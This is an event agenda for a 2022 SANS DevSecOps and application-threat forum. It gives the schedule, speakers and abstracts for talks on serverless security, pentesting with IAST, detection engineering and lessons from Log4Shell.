DevSecOps and Application Threat Landscape Solutions Forum 2022

10:30 AM

Welcome & Opening Remarks

Matt Bromiley, SANS Certified Instructor
Jeff Williams, Co-Founder and CTO, Contrast Security

10:45 AM

Developing and Deploying Secure Code with AWS Lambda

As serverless applications gain traction, new pain points have emerged like handling overly permissive function settings. Gaining an overall understanding of serverless applications is difficult given the abstraction of infrastructure, network and virtual machines. This makes it difficult for traditional application security tools to deliver accurate results.

This session examines some unique challenges when securing serverless applications including:

• A broad attack surface: Every function, API and protocol presents a potential attack vector
• A porous perimeter: Serverless applications have more fragmented boundaries.
• Increased complexity with permissions and access issues

Join to learn how to:

• Find and fix overly permissive AWS Lambda functions with ease
• Uncover vulnerabilities in your custom code and open source packages
• Gain a holistic view of your AWS Lambda application including all functions and related components.
• Make it easy for developers to build applications rapidly while eliminating risk

Tal Melamed, Sr Director Cloud Native Security Research, Contrast Security

11:45 AM

Help to Self-Help: How Developers Can Test Their Code Without Being Security Experts

What can developers do to get a bit more assurance that they are not introducing new vulnerabilities with their release and deployment of code? Furthermore, can developers test their code without being a penetration tester or cyber security expert?

In this talk, Chris Dale will introduce a methodologies penetration testers use when trying to discover the full scope of applications, and the process of hunting for vulnerabilities. These methodologies have several useful and practical areas where developers can do their own testing, supporting the developers in producing higher quality code with less bugs and vulnerabilities.

Chris Dale, SANS Certified Instructor

12:15 PM

What Next-Gen Pentesting Looks Like When Combined with IAST

There simply aren’t enough time or resources to perform pentesting on all the applications and APIs being built using Agile and DevOps — particularly when release cycles occur daily—or even faster.

Discover what next-generation pentesting looks like when combined with interactive application security testing (IAST). Attendees will learn …

• Why pentesting shouldn’t compete with other AppSec testing tools and waste time with things already thoroughly tested
• How pentesting should be combined with security instrumentation for tracking data flows, control flows, backend connections, etc.
• How pentesting can be adapted to modern application complexities such as APIs, microservices, etc.
• How pentesters can deliver deeper and more contextual findings to development teams

1:00 PM

A "Fireside" Chat on Next-Gen Pentesting

Immediately following his presentation on Next-Gen Pentesting Combined with IAST, Jeff sits down with our forum moderator, Matt Bromiley, to continue the discussion of next-gen pentesting. Pulling from the day's presentations and audience questions, we'll examine how the landscape has changed and what the future holds for pentesters and security teams. Join us for this interactive session, and bring your questions as we'll be monitoring and responding to the chat room live.

Jeff Williams, Co-Founder and CTO, Contrast Security

Matt Bromiley, SANS Senior Instructor

1:45 PM

Break

1:55 PM

Cybersecurity Detection and Response in DevSecOps

The full lifecycle objective of DevSecOps is to deploy systems with effective operational capability as well as detection and intervention in an environment with minimal human interaction. To do so there must be effective detection engineering within the development effort. Detection engineering is typically driven by hunting in production deployments, post deployment. But should be incorporated into development to assure observability and focus on likely attack vectors and weakness of deployed systems.

Anticipate that automation and orchestration will be used in production deployments to balance cyber security objectives and scarce operational resources; when people finally intervene to adjudicate complicated situations in time compressed and information-reduced scenarios they need the right understanding and data. Building cloud deployments, custom applications, and serverless scenarios with observability in mind will enhance visibility, issue detection, and intervention opportunities.

Listen to Christopher Crowley's synopsis of what this looks like in your DevSecOps, how to prepare your staff to think in this fashion, and how to align the technology and processes necessary to perform at this level.

2:30 PM

How to Win the DevSecOps Transformation Race

World class Application Security programs were not built in a day. The journey to success and meeting the new normals of code velocity require a coordinated effort between Engineering, DevOps and Security. Hear from Larry Maccherone, DevSecOps Transformation leader, on how to quickly align goals, incentives and remove friction in better securing code across the entire SDLC. Takeaways from this session will be:

• Recent trends in Application Security programs
• Stories and advice on taking your programs from zero to production and securing application development at the pace of tomorrow
• KPIs to measure program success
• Developer empowerment and ways to truly enable developers to ship more secure code without getting in their way

3:15 PM

Is Your Web Application Exploitable By Log4Shell Vulnerability?

In the two months since the Log4Shell vulnerability rocked the Internet, there have been numerous lessons learned. While there's no doubt that defenders will be dealing with vulnerable applications (while pen testers and threat actors target them) for years to come, we can begin implementing lessons immediately. There's little doubt that sooner or later there will be another vulnerability of this magnitude in a widely used library like log4j. Those who have acted to deploy appropriate solutions will no doubt benefit from their diligence and forward thinking. But simultaneously, they'll also be addressing the multitude of log4j vulnerabilities that were inevitably not disclosed by vendors and missed in vulnerability scanning.

Join me as I take a deep dive into:

• Software Composition Analysis (SCA) tools
• Threat intelligence for early warning and situational awareness
• Network segmentation to limit the blast radius of a successful exploitation
• Zero Trust Networking to limit exploitation vectors
• Vulnerability management solutions to scan for vulnerable applications
• Network Detection and Response (NDR) to identify exploitation and post-exploitation activity

Jake Williams, SANS Senior Instructor

3:45 PM

Wrap-Up

Matt Bromiley, SANS Senior Instructor